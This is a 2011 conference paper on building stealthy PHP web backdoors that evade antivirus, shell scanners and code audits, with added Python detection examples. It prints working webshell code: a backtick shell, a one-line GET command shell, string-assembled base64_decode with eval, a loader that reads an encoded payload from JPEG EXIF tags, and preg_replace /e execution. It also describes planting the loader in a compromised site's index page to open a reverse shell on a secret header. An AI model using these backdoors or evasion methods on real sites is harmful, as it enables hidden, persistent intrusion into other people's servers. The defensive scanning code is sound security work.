This document discusses techniques for creating stealthy web application backdoors. It begins by explaining how simple modifications can help evade signature-based antivirus detection. Next, it analyzes some tools that can detect backdoors by searching for suspicious functions. The main part proposes three evasion techniques: 1) Using variable functions instead of direct calls 2) Embedding backdoor code directly in webpage 3) Hiding code in JPEG EXIF headers to avoid input-based detection. The goal is to design backdoors that are small, avoid common triggers and stay undetectable to automated scans and manual code reviews.
1. Meet Us at http://www.Garage4Hackers.com FB1H2S
[http://www.Garage4Hackers.com]
[Web Backdoors]
[Attack, Evasion and Detection]
[fb1h2s aka Rahul Sasi]
[G4H 2011]
Abstract: This paper provides insight into common web backdoors and shows how simple manipulations can make them undetectable by AV and other security suites. It explains a few techniques that can be used to plant undetectable and unnoticed backdoors inside web applications.
This paper is mainly an update to an earlier paper of ours, Effectiveness of Antivirus in Detecting Web Application Backdoors, which questioned the effectiveness of AV with respect to web shells and analysed a couple of them. The current paper takes the topic further and explains a few methodologies for building stealthy application-layer backdoors in web scripting languages: the web backdoor attacks themselves and the evasion techniques that keep them undetected.
Web Application Backdoors:
These are simple scripts, written in the same language as the web application, that give an attacker a backdoor into the environment hosting the application.
Detection Methods [Signature Based Detection]
With this technique the antivirus software needs a signature of the backdoor, which means the vendor must already have obtained a copy of the backdoor and analysed it.
Evading Signature Based Detection:
We have previously documented how easy it is to bypass signature-based detection. Further analysis led us to conclude that almost all AV engines use a plain MD5 checksum, or simple text-string matches, as the signature for common web backdoors. That AV relies on MD5 or other checksums is not news, but it is a nightmare for the many sysadmins who trust those scans.
A very common backdoor named cybershell.php was scanned with the Total Av scanner, with the following results.
#Analysis 1.1
Sample md5: ef8828e0bc0641a655de3932199c0527
File Name: cybershell.php
Submission date: 2011-08-29 12:00:02 (UTC)
Result: 20 /44 (45.5%)
Bypassing this is easy: add an extra comment line to the code, or strip a few strings out of it, and the checksum no longer matches.
#Analysis 1.2
Sample md5: 251e62025daf17be22a028baa8d2b506
File Name: cybershell.php
Submission date: 2011-08-29 12:20:42 (UTC)
Result: 0 /44 (00.00%)
We have already documented how easy it is to bypass AV detection of web backdoors; it is so simple that writing it up again is pointless. Better ways of detecting them would be a more useful research topic.
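As an added example (not the paper's code; cybershell.php is not reproduced), this Python shows the effect on a constructed stand-in shell: one extra comment line changes the MD5, while a hash of the comment-stripped, whitespace-collapsed source does not. It also shows the limit of that improvement: renaming a variable beats the normalised hash as well, which is why the sections below turn to scanning for function calls instead of file hashes.

```python
"""Added example (not the paper's code): why a plain MD5 signature breaks on a
one-line edit, and how hashing a normalised form survives it. The shell text is
constructed here; the page's cybershell.php is not reproduced."""
import hashlib
import re

SHELL = "<?php\n$cmd = $_GET['cmd'];\nsystem($cmd);\n?>\n"
# The page's trick: one extra comment line, identical behaviour, new MD5.
SHELL_PADDED = "<?php\n// nothing to see here\n$cmd = $_GET['cmd'];\nsystem($cmd);\n?>\n"
# Renaming a variable also keeps the behaviour, and this edit survives normalisation.
SHELL_RENAMED = SHELL.replace("$cmd", "$c")

PHP_COMMENT = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)


def md5_hex(src):
    """The kind of whole-file signature the page says most AV engines rely on."""
    return hashlib.md5(src.encode()).hexdigest()


def normalize_php(src):
    """Strip comments and collapse runs of whitespace before hashing.
    Assumption: no comment markers inside string literals (a URL containing //
    would be mangled); a production normaliser should use PHP's own tokenizer."""
    return re.sub(r"\s+", " ", PHP_COMMENT.sub("", src)).strip()


def normalized_md5(src):
    return md5_hex(normalize_php(src))


if __name__ == "__main__":
    for name, src in (("original", SHELL), ("padded", SHELL_PADDED), ("renamed", SHELL_RENAMED)):
        print(f"{name:9} md5={md5_hex(src)}  normalized={normalized_md5(src)}")
```

The padded copy hashes differently under md5_hex but identically under normalized_md5; the renamed copy differs under both, so normalisation buys a little robustness against lazy edits and nothing against a deliberate one.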
Moving on to the main paper: since we now know that AV is of little use in detecting web backdoors, there is no point developing evasion techniques against it. But there are a handful of good tools and scripts that can scan for and detect such backdoors, and a server admin browsing through the source on his web server can easily spot these ugly backdoors. So this paper is mainly about evading those two situations (examples are in PHP).
Web Backdoor Shell Detection on Servers (Specialized Tools)
As documented previously, the following are a few specialized tools that are effective:
1. Web Shell Detection Using NeoPI - A python Script
(https://github.com/Neohapsis/NeoPI)
2. PHP Shell Scanner - A perl Script
(http://ketan.lithiumfox.com/doku.php?id=phpshell_scanner)
3. PHP script to find malicious code on a hacked server - A PHP Script
(http://25yearsofprogramming.com/blog/2010/20100315.htm)
The logic used by most of these scanners is simply to find all references to the following function calls; they are used for file management and OS command execution and are unavoidable parts of web shells:
grep -RPn "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readfile|passthru)" /pathto/webdir/
NeoPI
NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and
encrypted content within text and script files. The intended purpose of NeoPI is to aid in the
identification of hidden web shell code. The development focus of NeoPI was creating a tool
that could be used in conjunction with other established detection methods such as Linux
Malware Detect or traditional signature/keyword based searches.
(From the NeoPI project description.)
Of the tools listed above NeoPI gives the best results, so we will concentrate on this particular tool. One issue with all of these tools is that manual assessment is still very much required, since there are a lot of false positives.
A few backdoor snippets these scanners will detect:
PHP backtick method (the backtick operator runs the string in $_ as a shell command):
<?=@`$_`?> //Php Back tick Method
Any code containing one of the blacklisted functions above would be caught, for example this fragment from a typical shell:
elseif (is_callable("system") and !in_array("system", $disablefunc)) {
    $v = @ob_get_contents(); @ob_clean();
    system($cmd);
    $result = @ob_get_contents(); @ob_clean();
    echo $v;
}
The following would also be detected, because NeoPI checks whether a file reads like natural language, and a long run of encoded characters gets flagged:
$code = "aGVsbG8gYWxsIHRoaXMgaXMganVzdCBhIHRlc3QgZm9yIHRoZSBwYXBlciBub3RoaW5nIGJhZCBidWhhIGhhIGhhIGhlbGxvIGFsbCB0aGlzIGlzIGp1c3QgYSB0ZXN0IGZvciB0aGUgcGFwZXIgbm90aGluZyBiYWQgYnVoYSBoYSBoYWhlbGxvIGFsbCB0aGlzIGlzIGp1c3QgYSB0ZXN0IGZvciB0aGUgcGFwZXIgbm90aGluZyBiYWQgYnVoYSBoYSBoYWhlbGxvIGFsbCB0aGlzIGlzIGp1c3QgYSB0ZXN0IGZvciB0aGUgcGFwZXIgbm90aGluZyBiYWQgYnVoYSBoYSBoYQ==";
Decodethis($code);
Evasion Techniques
Evasion #1:
Situation: the admin might scan his server with one of the above tools.
Evasion:
PHP supports variable functions: a string variable followed by parentheses is called as the function of that name, so the blacklisted name never has to appear literally in the file.
// The following code is detected, because base64_decode is flagged as malicious content by one of the above tools
<?php
$badcode = "am_encoded_bad_code_buhaha";
eval(base64_decode($badcode));
?>
An alternate way to bypass the scan is to assemble the function name at runtime:
<?php
$badcode = "am_encoded_bad_code_buhaha";
$b = "base";
$c = "64_";
$d = "decode";
$alternate = $b.$c.$d;        // "base64_decode", but the literal never appears in the source
eval($alternate($badcode));   // variable function call
?>
We will be explaining an alternate for eval soon.
Evasion #2:
Situation: the admin manually searches through the source code. Strings like base64 could make him suspicious, and he might spot large encoded strings in his web application files.
Evasion: make the backdoor code as small as possible, so that it can be tucked in among other code and go unnoticed.
<?
$_ = $_GET[2];    // function name, e.g. system
$__ = $_GET[1];   // its argument, e.g. id
echo '<pre>'.$_($__).'</pre>';
?>
It can be shortened further to the following:
<?=($_=@$_GET[c]).@$_($_GET[f])?>
This is called as ?c=system&f=id. The bare c and f are undefined constants, which old PHP versions silently treat as the strings "c" and "f" (PHP 8 throws an Error instead). These few characters give command execution, are not detected by any of the tools above, and are hard to spot in a manual code audit. Switching from GET to POST also keeps the parameters out of the access log: the request for the page is still logged, but the function name and command are not.
Evasion #3:
Situation: the application is audited with a source code scanner that finds every user input field and traces possible code injection paths, so taking input via $_GET or $_POST might get detected.
Evasion:
It is possible to place data inside JPEG EXIF headers, so we put all function names and data inside an image and assemble them at runtime; the input then comes not from the user but from a local file.
<?php
$_ = exif_read_data('image.jpg');
$d = $_['Make'];      // holds the string "base64_decode"
$str = $_['Code'];    // holds the base64-encoded evil code (any tag exif_read_data() returns will do)
eval($d($str));       // eval(base64_decode(code))
?>
Here image.jpg can hold all our PHP code and shellcode; exif_read_data() exposes the individual metadata tags, and the function calls are constructed at runtime. Similarly we could hide a reverse shell inside an image and place the loader in the index page, so that whenever a request for the main page arrives carrying a particular HTTP header the backdoor fires. This is less noisy and is not caught by AV, code audits, or any backdoor-hunting script.
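As an added example (not the paper's code), the Python below builds a minimal JPEG container whose EXIF IFD0 carries text tags, parses it back with a small TIFF/EXIF reader, and flags fields that hold a dangerous PHP callable name, PHP source, or base64 that decodes to PHP. It is the check an admin would want next to a script scanner, because images under the webroot are a data store too. The staged image uses Make for the function name and ImageDescription for the payload, since the page's $_['Code'] key only stands for whichever tag the attacker picked; both images are constructed inline (SOI + APP1 + EOI, no picture data), and the tag ids come from the TIFF/EXIF IFD0 specification.

```python
"""Added example (not the paper's code): build a JPEG container with EXIF text
tags, read the tags back, and flag fields used as a code store."""
import base64
import re
import struct

ASCII = 2                               # TIFF field type: NUL-terminated string
TAGS = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
        0x0131: "Software", 0x013B: "Artist", 0x8298: "Copyright"}
TAG_IDS = {name: tag for tag, name in TAGS.items()}


def build_exif_jpeg(fields):
    """Return a JPEG container with one APP1/Exif segment (big-endian TIFF) whose
    IFD0 holds {tag_name: text}; values longer than 4 bytes are stored after the IFD."""
    entries = sorted((TAG_IDS[name], text.encode() + b"\0") for name, text in fields.items())
    ifd_offset = 8                                      # IFD0 follows the 8-byte TIFF header
    data_offset = ifd_offset + 2 + 12 * len(entries) + 4
    ifd, data = struct.pack(">H", len(entries)), b""
    for tag, raw in entries:
        if len(raw) <= 4:                               # short value fits in the entry
            ifd += struct.pack(">HHI", tag, ASCII, len(raw)) + raw.ljust(4, b"\0")
        else:                                           # otherwise the entry holds an offset
            ifd += struct.pack(">HHII", tag, ASCII, len(raw), data_offset + len(data))
            data += raw
    ifd += struct.pack(">I", 0)                         # no next IFD
    tiff = b"MM" + struct.pack(">HI", 42, ifd_offset) + ifd + data
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def read_exif_ascii(jpeg):
    """Walk the JPEG marker segments; return {tag_name: text} for the ASCII entries
    of IFD0 in the first Exif APP1 segment, or {} if there is none."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == 0xD9:                              # EOI
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        payload = jpeg[pos + 4:pos + 2 + length]
        pos += 2 + length
        if marker == 0xE1 and payload.startswith(b"Exif\0\0"):
            return _parse_ifd0(payload[6:])
    return {}


def _parse_ifd0(tiff):
    end = {b"II": "<", b"MM": ">"}[tiff[:2]]            # byte-order mark
    ifd = struct.unpack(end + "I", tiff[4:8])[0]
    count = struct.unpack(end + "H", tiff[ifd:ifd + 2])[0]
    out = {}
    for i in range(count):
        e = ifd + 2 + 12 * i
        tag, typ, n = struct.unpack(end + "HHI", tiff[e:e + 8])
        if typ != ASCII:
            continue
        start = e + 8 if n <= 4 else struct.unpack(end + "I", tiff[e + 8:e + 12])[0]
        out[TAGS.get(tag, hex(tag))] = tiff[start:start + n].rstrip(b"\0").decode("latin-1")
    return out


DANGEROUS = {"system", "exec", "passthru", "shell_exec", "eval", "assert",
             "base64_decode", "gzinflate", "str_rot13"}
PHP_SOURCE = re.compile(r"<\?(php)?|\beval\s*\(|\$_(GET|POST|REQUEST|SERVER)|base64_decode|preg_replace", re.I)
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def suspicious_exif_fields(jpeg):
    """Return {tag_name: reason} for text fields that look like a code store;
    ordinary camera strings such as "Canon" or "EOS 5D" produce nothing."""
    hits = {}
    for tag, text in read_exif_ascii(jpeg).items():
        if text.strip().lower() in DANGEROUS:
            hits[tag] = "callable-name"
        elif PHP_SOURCE.search(text):
            hits[tag] = "php-source"
        elif BASE64_BLOB.match(text):
            try:
                decoded = base64.b64decode(text, validate=True).decode("latin-1")
            except ValueError:
                continue
            if PHP_SOURCE.search(decoded):
                hits[tag] = "base64-php"
    return hits


# Constructed samples: a camera-like image and one staged the way Evasion #3 describes.
CLEAN_JPEG = build_exif_jpeg({"Make": "Canon", "Model": "EOS 5D", "Software": "v1"})
EVIL_JPEG = build_exif_jpeg({
    "Make": "base64_decode",
    "ImageDescription": base64.b64encode(b'system($_GET["c"]);').decode(),
})

if __name__ == "__main__":
    print("clean:", suspicious_exif_fields(CLEAN_JPEG))
    print("evil: ", suspicious_exif_fields(EVIL_JPEG))
```

Run over a real /images directory this only inspects IFD0 string tags; a fuller scanner would also descend into the Exif sub-IFD for UserComment and look at XMP and IPTC blocks, which are equally good hiding places.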
Note: an alternative to eval() is preg_replace() with the /e modifier, which evaluates the replacement string as PHP code. (The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this only works on the PHP 5 servers that were current when this was written.)
<?php
$code_fb = 'print("Hello, fb1h2s !".PHP_EOL);';
preg_replace('/(.*)/e', $code_fb, '');
?>
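As an added example (not the paper's code, nor NeoPI's), the following Python puts the page's two detection ideas, the grep blacklist and a NeoPI-style high-entropy-literal check, next to rules that look for what the three evasions cannot avoid: a variable function call, eval()/assert(), preg_replace() with /e, and the backtick operator. The samples are re-typings of the snippets on this page plus a benign control, all constructed here; an 80-character base64 blob stands in for the page's long encoded string.

```python
"""Added example (not the paper's or NeoPI's code): the page's detection ideas
beside rules aimed at the constructs the three evasions rely on."""
import base64
import math
import re
from collections import Counter

# Rule 1: the blacklist from the page's grep command.
KEYWORDS = re.compile(r"\b(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip"
                      r"|mkdir|fopen|fclose|readfile|passthru)\b")
# Rule 2 (NeoPI-style): a long string literal with high entropy looks like an encoded payload.
STRING_LITERAL = re.compile(r"""(['"])(.*?)\1""", re.S)
MIN_LITERAL_LEN, ENTROPY_LIMIT = 40, 4.5
# Rules 3-6: what the evasions need. Variable functions are legal PHP (callbacks
# use them), so these are triage signals for a human, not proof of a backdoor.
EVASION_RULES = {
    "variable-function": re.compile(r"\$\w+\s*\("),                       # $f(...)
    "eval": re.compile(r"\b(eval|assert)\s*\("),
    "preg-e": re.compile(r"""preg_replace\s*\(\s*['"]/.*?/[a-z]*e[a-z]*['"]""", re.I),
    "backtick": re.compile(r"`[^`]*\$[^`]*`"),                             # `$cmd` shell operator
}


def shannon_entropy(text):
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


def page_rules(src):
    """What the grep / NeoPI approach described on the page would flag."""
    hits = set()
    if KEYWORDS.search(src):
        hits.add("keyword")
    for m in STRING_LITERAL.finditer(src):
        if len(m.group(2)) >= MIN_LITERAL_LEN and shannon_entropy(m.group(2)) > ENTROPY_LIMIT:
            hits.add("entropy")
    return hits


def evasion_rules(src):
    return {name for name, rx in EVASION_RULES.items() if rx.search(src)}


def scan(src):
    return page_rules(src) | evasion_rules(src)


# Constructed samples: the page's snippets re-typed, plus a benign control.
SAMPLES = {
    "backtick": r"<?=@`$_`?>",
    "system_call": r"""elseif (is_callable("system") and !in_array("system", $disablefunc)) { system($cmd); }""",
    "base64_blob": '$code = "' + base64.b64encode(bytes(range(60))).decode() + '"; Decodethis($code);',
    "variable_function": r"""<?php $b = "base"; $c = "64_"; $d = "decode"; $alternate = $b.$c.$d; eval($alternate($badcode)); ?>""",
    "tiny_shell": r"<?=($_=@$_GET[c]).@$_($_GET[f])?>",
    "exif_loader": r"""<?php $_ = exif_read_data('image.jpg'); $d = $_['Make']; $str = $_['Code']; eval($d($str)); ?>""",
    "preg_e": r"""<?php preg_replace('/(.*)/e', $code_fb, ''); ?>""",
    "benign": r"""<?php $total = 0; foreach ($items as $item) { $total += $item['price']; } echo htmlspecialchars($title); ?>""",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:18} page-rules={sorted(page_rules(src))!s:22} all-rules={sorted(scan(src))}")
```

The page rules catch the backtick-free shell fragment and the encoded blob, and nothing from the three evasion sections; the added rules catch every evasion while leaving the benign snippet alone. On a real code base expect hits on legitimate callback code, which is why the output is a list for an auditor rather than a verdict.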
Demo:
The small loader above is injected into the index page of a compromised site.
The image holding the actual malicious code is added to the site's /images directory.
The code is triggered by a particular HTTP header, for example User-Agent == w1d0ws.
On accessing the index page we get a reverse shell.
Benefits:
Backdoor remains undetected by shell scanners and AV
Remains undetected by code auditing software
No incriminating traces in log files (the trigger looks like an ordinary request for the index page)
Here is how it looks (screenshots in the original deck): the innocent-looking page ("Am an innocent page"), the triggering request, and the shell obtained.
Improvements:
The POC code/demo includes PHP code that can load shellcode and provide a connect-back shell.
Thanks for Reading,
Fb1h2s @ gmail.com
http://www.Garage4Hackers.com
[This paper was presented, with demos, at the C0C0N Sec Conference on 9 October 2011]